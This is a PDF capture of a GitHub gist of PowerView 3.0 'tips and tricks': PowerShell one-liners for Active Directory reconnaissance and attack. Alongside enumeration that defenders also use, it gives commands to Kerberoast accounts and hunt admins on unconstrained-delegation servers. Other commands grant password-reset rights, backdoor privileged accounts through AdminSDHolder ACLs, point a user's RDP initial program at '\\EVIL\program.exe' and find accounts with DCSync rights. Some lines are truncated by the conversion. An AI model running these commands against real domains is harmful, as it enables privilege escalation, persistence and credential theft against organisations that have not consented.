Search… All gists GitHub Sign up for a GitHub account Sign in

Instantly share code, notes, and snippets. Create a gist now

HarmJ0y / PowerView-3.0-tricks.ps1 Star 57 Fork 20

Last active 6 days ago

Code Revisions 8 Stars 57 Forks 20 Embed <script src="https://gis Download ZIP

PowerView-3.0 tips and tricks

PowerView-3.0-tricks.ps1 Raw

1 # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/

2 # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
3
4 # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
5 # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
6
7 # New function naming schema:
8 # Verbs:
9 # Get : retrieve full raw data sets
10 # Find : ‘find’ specific data entries in a data set
11 # Add : add a new object to a destination
12 # Set : modify a given object
13 # Invoke : lazy catch-all
14 # Nouns:
15 # Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
16 # Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 17 # Verb-Net* : indicates that Win32 API access is being used under the hood
18
19
20 # get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
21 Get-DomainGroup -MemberIdentity <User/Group>
22
23 # get all the effective members of a group, 'recursing down'
24 Get-DomainGroupMember -Identity "Domain Admins" -Recurse
25
26 # use an alterate creadential for any function
27 $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
28 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
29 Get-DomainUser -Credential $Cred
30
31 # retrieve all the computer dns host names a GPP password applies to
32 Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
33
34 # get all users with passwords changed > 1 year ago, returning sam account names and password last set times
35 $Date = (Get-Date).AddYears(-1).ToFileTime()
36 Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
37
38 # all enabled users, returning distinguishednames
39 Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
40 Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
41
42 # all disabled users
43 Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
44 Get-DomainUser -UACFilter ACCOUNTDISABLE
45
46 # all users that require smart card authentication
47 Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
48 Get-DomainUser -UACFilter SMARTCARD_REQUIRED
49

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 50 # all users that *don't* require smart card authentication, only returning sam account names
51 Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
52 Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
53
54 # use multiple identity types for any *-Domain* function
55 'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','a
56
57 # find all users with an SPN set (likely service accounts)
58 Get-DomainUser -SPN
59
60 # check for users who don't have kerberos preauthentication set
61 Get-DomainUser -PreauthNotRequired
62 Get-DomainUser -UACFilter DONT_REQ_PREAUTH
63
64 # find all service accounts in "Domain Admins"
65 Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
66
67 # find users with sidHistory set
68 Get-DomainUser -LDAPFilter '(sidHistory=*)'
69
70 # find any users/computers with constrained delegation st
71 Get-DomainUser -TrustedToAuth
72 Get-DomainComputer -TrustedToAuth
73
74 # enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for de
75 $Computers = Get-DomainComputer -Unconstrained
76 $Users = Get-DomainUser -AllowDelegation -AdminCount
77
78 # return the local *groups* of a remote server
79 Get-NetLocalGroup SERVER.domain.local
80
81 # return the local group *members* of a remote server using Win32 API methods (faster but less info)
82 Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 83
84 # Kerberoast any users in a particular OU with SPNs set
85 Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
86
87 # Find-DomainUserLocation == old Invoke-UserHunter
88 # enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
89 Find-DomainUserLocation -ComputerUnconstrained -ShowAll
90
91 # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
92 Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
93
94 # find all computers in a given OU
95 Get-DomainComputer -SearchBase "ldap://OU=..."
96
97 # Get the logged on users for all machines in any *server* OU in a particular domain
98 Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname
99
100 # enumerate all gobal catalogs in the forest
101 Get-ForestGlobalCatalog
102
103 # turn a list of computer short names to FQDNs, using a global catalog
104 gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
105
106 # enumerate the current domain controller policy
107 $DCPolicy = Get-DomainPolicy -Policy DC
108 $DCPolicy.PrivilegeRights # user privilege rights on the dc...
109
110 # enumerate the current domain policy
111 $DomainPolicy = Get-DomainPolicy -Policy Domain
112 $DomainPolicy.KerberosPolicy # useful for golden tickets ;)
113 $DomainPolicy.SystemAccess # password age/etc.
114
115 # enumerate what machines that a particular user/group identity has local admin rights to

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 116 # Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
117 Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
118
119 # enumerate what machines that a given user in the specified domain has RDP access rights to
120 Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
121
122 # export a csv of all GPO mappings
123 Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
124
125 # use alternate credentials for searching for files on the domain
126 # Find-InterestingDomainShareFile == old Invoke-FileFinder
127 $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
128 $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
129 Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
130
131 # enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
132 Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
133
134 # grant user 'will' the rights to change 'matt's password
135 Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
136
137 # audit the permissions of AdminSDHolder, resolving GUIDs
138 Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
139
140 # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
141 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
142
143 # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
144 Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
145 ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
146 }
147
148 # find linked DA accounts using name correlation

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 149 Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.spli
150
151 # save a PowerView object to disk for later usage
152 Get-DomainUser | Export-Clixml user.xml
153 $Users = Import-Clixml user.xml
154
155 # Find any machine accounts in privileged groups
156 Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
157
158 # Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
159 Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3
160
161 # find all policies applied to a current machine
162 Get-DomainGPO -ComputerIdentity windows1.testlab.local
163
164 # enumerate all groups in a domain that don't have a global scope, returning just group names
165 Get-DomainGroup -GroupScope NotGlobal -Properties name
166
167 # enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
168 # query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
169 $ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectcl
170 $Domains = @{}
171 $ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
172 # extract the domain the foreign user was added to
173 $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
174 # check if we've already enumerated this domain
175 if (-not $Domains[$ForeignUserDomain]) {
176 $Domains[$ForeignUserDomain] = $True
177 # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
178 $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
179 Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
180 }
181 }

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 182 $ForeignMemberships | fl
183
184 # if running in -sta mode, impersonate another credential a la "runas /netonly"
185 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
186 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
187 Invoke-UserImpersonation -Credential $Cred
188 # ... action
189 Invoke-RevertToSelf
190
191 # enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned
192 Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
193
194 # set the specified property for the given user identity
195 Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
196
197 # Set the owner of 'dfm' in the current domain to 'harmj0y'
198 Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
199
200 # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
201 Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
202 ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
203 }

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

© 2018 GitHub, Inc. Terms Privacy Security Status Help Contact GitHub API Training Shop Blog About

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD